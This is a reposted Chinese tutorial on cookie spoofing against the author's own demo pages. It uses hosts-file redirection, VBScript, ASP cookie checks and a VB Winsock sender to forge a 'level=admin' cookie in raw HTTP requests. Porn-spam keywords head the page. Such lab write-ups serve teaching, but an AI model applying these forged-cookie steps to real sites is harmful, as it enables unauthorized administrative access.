国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

打開APP
userphoto
未登錄

開通VIP,暢享免費(fèi)電子書等14項(xiàng)超值服

開通VIP
cookie欺騙教程


cookie欺騙教程(1)
             ---------產(chǎn)生一個(gè)COOKIE文件并改變它

   唉,很早就想點(diǎn)關(guān)于COOKIE的東東了,主要是網(wǎng)上有不少文章說半天其實(shí)也
沒有多少實(shí)質(zhì)的東西。
   首先大家明白什么是COOKIE,具體點(diǎn)說如果是98那么它們默認(rèn)存放在C:\windows\cookies
目錄下,如果是2k它們在C:\Documents and Settings\%你的用戶名%\Cookies目錄下(每個(gè)文件都不會(huì)超過4KB)
   它們的文件名格式為:你的用戶名@產(chǎn)生的COOKIE的網(wǎng)頁文件所在的WEB目錄[COOKIE改變的次數(shù)].txt
   具體的例子:iwam_system@cookie[3].txt
   再來看一看一個(gè)最簡單的COOKIE文件的內(nèi)容:
   level
admin
www.locking.8u8.com/cookie/
0
1331699712
29536653
4044081984
29528196
*
   
   最前面的兩段為服務(wù)器產(chǎn)生的COOKIE內(nèi)容(level和admin)第三段為產(chǎn)生這個(gè)COOKIE文件的網(wǎng)站的域名和WEB目錄
這兒就要注意了沒有記錄產(chǎn)生COOKIE文件的文件名!所以在同一個(gè)目錄下不同文件產(chǎn)生的COOKIE是同一個(gè)文件只是每
產(chǎn)生一次COOKIE的文件名的中括號(hào)里的數(shù)字就要加1,后面的那些就不管它了我也不懂哈:)
   再來看看如何生成一個(gè)COOKIE我以vbs cript為例:

<s cript language=vbs>
document.cookie="level" & "=" & "user" & ";expires=Monday, 01-Jan-03 12:00:00 GMT"
msgbox document.cookie
</s cript>

  這兒我們特別人注意的是最后一段 ";expires=Monday, 01-Jan-03 12:00:00 GMT"這是用來說明產(chǎn)生的COOKIE文件的
有效時(shí)間的,如果沒有那么這個(gè)COOKIE你將不會(huì)在本文開頭所說的目錄里找到它。這個(gè)例子中有效時(shí)間是2003年當(dāng)然你

也就能在本地硬盤上找到它們了。
  另外當(dāng)用document.cookie來得到COOKIE內(nèi)容時(shí)設(shè)置COOKIE有效時(shí)間這一段將被忽略(當(dāng)然這也方便了網(wǎng)站的COOKIE

*作)比如說上面將彈出一個(gè)內(nèi)容為  level=user的對話框

好了現(xiàn)在我們來實(shí)戰(zhàn)一下:
我的網(wǎng)站叫www.locking.8u8.com在它的COOKIE目錄里有兩個(gè)文件一個(gè)是admin1.htm內(nèi)容就是上面的例子
還有一個(gè)文件叫l(wèi)evel1.htm內(nèi)容如下:
<s cript language=vbs>
co=document.cookie
le=mid(co,instr(co,"=")+1,len(co)-instr(co,"=")+1)
if le="user" then
msgbox "you are a user"
else
 if le="admin" then
msgbox "you are a administrator"
 else
msgbox "you not login"
 end if
end if
</s cript>

當(dāng)你先瀏覽admin1.htm后再瀏覽level1.htm時(shí)將彈出一個(gè)對話框內(nèi)容為:"you are a user",當(dāng)你沒有瀏覽過
admin1.htm而直接瀏覽level1.htm將說 "you not login" (注意有的人可能會(huì)先瀏覽admin1.htm后再直接在硬盤
上更改COOKIE的內(nèi)容當(dāng)然這樣是不行的)
 
  好了我們的目標(biāo)就是讓我們能在瀏覽level1時(shí)彈個(gè)框框說 "you are a administrator" :)
  辦法只有兩個(gè)咯:1)把8u8黑了,然后找到那個(gè)level1.htm改了不就可以了不過本篇文章不做討論哈
                  2)進(jìn)行COOKIE欺騙,OK LET GO:)

-----------------------------------(我的系統(tǒng)環(huán)境一臺(tái)2kserver+iis5)
第一步:自已做一個(gè)文件名叫admin2.htm吧內(nèi)容如下
<s cript language=vbs>
document.cookie="level" & "=" & "admin" & ";expires=Monday, 01-Jan-03 12:00:00 GMT"
</s cript>
然后把它放入一個(gè)名叫COOKIE的可瀏覽目錄中(COOKIE要位于根目錄)

第二步:找到位于C:\WINNT\system32\drivers\etc下的hosts文件在它的后面加上如下一段:

127.0.0.1 www.locking.8u8.com

第三步:仿問www.locking.8u8.com/cookie/admin2.htm(這兒實(shí)際是仿問的本機(jī)的文件)

第四步:刪除hosts中剛才我們添加的內(nèi)容然后再清掉IE的歷史記錄

第五步:讓我們再次仿問www.locking.8u8.com/cookie/level1.htm

  怎么樣我們現(xiàn)在是 administrator了吧(注意仿問網(wǎng)站是一定要在前面加三個(gè)w)


COOKIE欺騙教程2
                 
                     -------------   利用winsocket編程發(fā)送偽造COOKIE

    在上一節(jié)中我所舉的例子是一個(gè)存活期很長的COOKIE,對于這種
COOKIE他會(huì)生成在我們的本地盤上的,而對于那些關(guān)閉瀏覽器就失效
的COOKIE我們該怎樣來進(jìn)行欺騙偽造呢?
    首先我們應(yīng)該知道在我第一節(jié)的例子中彈那個(gè)"you are a administrator"
框框的網(wǎng)頁(level1.htm)其實(shí)是下載在我的本地然后執(zhí)行的,也就是說
他對COOKIE的檢驗(yàn)讀取也是在本地,那如果是在遠(yuǎn)程服務(wù)器上呢?比如
一個(gè)ASP程序他又是如何讀取我們的COOKIE的呢?
    先來看看基本的東東吧:當(dāng)我們使用HTTP協(xié)議向遠(yuǎn)程主機(jī)發(fā)送一個(gè)
GET或是POST請求時(shí),那么如果有這個(gè)域名的COOKIE存在(不管是在內(nèi)存中
還是本地盤上的)都將和請求一起發(fā)送到服務(wù)器去.

下面的就是一個(gè)實(shí)際的例子:

GET /ring/admin.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive
Cookie: level=user; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM

看到最后一行了吧:)

    然后我們再來看看服務(wù)器是如何進(jìn)行COOKIE檢驗(yàn)的,我舉了一個(gè)簡單的例子:
有兩個(gè)ASP文件一個(gè)叫admin.asp,還有一個(gè)叫l(wèi)evel.asp

-----------admin.asp------------------
<%response.write now()%>
<%response.write "<br>"%>
<%response.cookies("level")="user"%>
<%response.write "<html><s cript>document.write(document.cookie);</s cript></html>"%>

-----------cut here-------------------

-----------level.asp------------------
<%
if  Request.Cookies("level")<>"" then
response.write "<html><s cript>document.write(document.cookie);</s cript></html>"
 if request.cookies("level")="user" then
response.write "<html><s cript>alert(<|>you are a user<|>);</s cript></html>"
 else
    if request.cookies("level")="admin" then
response.write "<html><s cript>alert(<|>you are administrator!<|>);</s cript></html>"
set fso1=server.createobject("s cripting.filesystemobject")
set fil=fso1.opentextfile("d:\sms\ring\a.txt",8,true)
fil.writeline "you are admin!"
    end if
 end if
else
response.write "<html><s cript>alert(<|>you are not login<|>);</s cript></html>"
end if
%> 
-----------cut here-------------------

  說明:當(dāng)你請求admin.asp時(shí),將產(chǎn)生一個(gè)臨時(shí)的COOKIE(你關(guān)閉瀏覽器就會(huì)失效),然后我們不關(guān)閉瀏覽器而
請求level.asp時(shí)它就會(huì)用request.cookies來提取你發(fā)出的請求里面的cookie,如果你的COOKIE里面的內(nèi)容是
admin的話那么它將用fso對象在服務(wù)器產(chǎn)生一個(gè)記錄文件(a.txt要注意的是我們在實(shí)驗(yàn)時(shí)要把目錄設(shè)為可寫)

  好了就介紹這么多吧,我們的目的就是讓服務(wù)器產(chǎn)生a.txt并寫入內(nèi)容"you are admin"還是進(jìn)行上一節(jié)的
域名欺騙嗎?不是讓我們寫一個(gè)winsocket程序吧,Let GO:)

   下面是我們VB+WINSCOKET控件寫的一個(gè)簡單的例子的源代碼:

-----------------------COOKIE SEND---------------------------------------
  Private Sub Command1_Click()
Winsock1.RemotePort = Text3.Text  <|>遠(yuǎn)程主機(jī)打開的端口一般都為80
Winsock1.RemoteHost = Text2.Text  <|>遠(yuǎn)程主機(jī)的域名也可以輸IP
Winsock1.Connect                  <|>打開一個(gè)SOCKET連接
Command1.Enabled = False          <|>一次只能打開一個(gè)連接所以要讓SEND按鈕失效
End Sub

Private Sub winsock1_Connect()
     Winsock1.SendData Text1.Text <|>打開連接成功的話就發(fā)送數(shù)據(jù)
End Sub

Private Sub Command2_Click()
Winsock1.Close
Command1.Enabled = True           <|>關(guān)閉連接,讓SEND按鈕有效
End Sub


Private Sub winsock1_DataArrival(ByVal bytesTotal As Long)    <|>接收數(shù)據(jù),可以讓我們檢查數(shù)據(jù)是否發(fā)送成功
Dim tmpstr As String
Winsock1.GetData tmpstr
Text4.Text = tmpstr
End Sub

-----------------------CUT HERE--------------------------------------------

   好,再讓我們看一看具體的過程吧:這兒要用到一個(gè)不錯(cuò)的程序WinSock Expert v0.3 beta 1

一步:打開一個(gè)IE然后再打開winsock expert選擇監(jiān)視剛才打開的IE窗口的數(shù)據(jù)包
二步: 在IE地址欄輸http://61.139.xx.xx/ring/admin.asp,那個(gè)我將看到發(fā)出了如下數(shù)據(jù)

GET /ring/admin.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive

     不要半閉窗口請http://61.139.xx.xx/ring/level.asp,我們又將看到發(fā)出了如下數(shù)據(jù)

GET /ring/level.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive
Cookie: level=user; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM

三步: 好了對第二次發(fā)出的數(shù)據(jù)的最后一行Cookie: level=user; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM
就是我們要改的東東,由于level.asp中相應(yīng)的COOKIE的檢驗(yàn)語句為if request.cookies("level")="admin" then
所以我們只要把上面的數(shù)據(jù)的最后一行改成Cookie: level=admin; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM
就可以了,后面的東東很重要下面我再說明一下:)

四步: 把改過的數(shù)據(jù)拷到我編的程序的發(fā)送框里面輸入端口和域名后。。。。。

五步:到服務(wù)器看看是不是生成了那個(gè)a.txt里面的內(nèi)容為"you are admin!


好了不寫了,主要還是自已多實(shí)驗(yàn)就可以了為了放便大家本文章的程序代碼完全公開哈

1.admin.asp和level.asp:     http://locking.8u8.com/cookie/admin.txt和level.txt
2.cookieclient.exe及源代碼: http://locking.8u8.com/cookie/cookiesend.zip
3.winsock expert: http://software.tom.com/download.asp?id=7500 或是 http://dxqsoft.myrice.com/ 2085
本站僅提供存儲(chǔ)服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請點(diǎn)擊舉報(bào)。
打開APP,閱讀全文并永久保存 查看更多類似文章
猜你喜歡
類似文章
asp中cookie欺騙/注入原理與防范
利用Session欺騙構(gòu)造最隱蔽的WebShell
怎么判斷入住的賓館房間是否有攝像頭,防止偷拍
SRC實(shí)戰(zhàn) | Cookie注入漏洞
如何使用COOKIE欺騙
揭秘IP地址欺騙:黑客的隱形利器
更多類似文章 >>
生活服務(wù)
分享 收藏 導(dǎo)長圖 關(guān)注 下載文章
綁定賬號(hào)成功
后續(xù)可登錄賬號(hào)暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服